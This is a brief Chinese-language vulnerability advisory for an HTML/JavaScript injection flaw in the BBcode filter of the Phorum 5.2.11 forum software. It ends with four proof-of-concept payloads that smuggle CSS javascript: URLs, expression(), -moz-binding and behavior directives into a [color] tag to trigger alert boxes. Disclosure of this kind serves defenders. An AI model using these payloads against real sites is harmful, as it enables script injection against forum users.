Phorum过滤引擎HTML代码注入漏洞
影响版本:
Phorum 5.2.11
程序介绍:
Phorum是一款基于PHP的WEB论坛程序,可在Linux和Unix操作系统下使用,也可在Microsoft Windows操作系统下使用。
漏洞分析:
Phorum的过滤引擎没有充分地验证某些BBcode参数,远程攻击者可以在所提交的请求中使用导致注入并执行恶意JavaScript代码。
漏洞利用:
[color=#000000;background-image:url(javascript:alert(Sysdream_IE6_Alert));]Sysdream Testing IE6[/color]
[color=#000000;xss:expression(alert(Sysdream_IE7_Alert));]Sysdream Testing XSS[/color]
[color=#000000;-moz-binding:url(http://127.0.0.1/phorum/file.php?0,file=9,filename=script.xml#mycode);]Sysdream Testing FF[/color]
[color=#000000;behavior:url(http://127.0.0.1/phorum/file.php?0,file=8,filename=script.htc);]Sysdream Testing FF[/color]
下一篇:PHP的SQL注入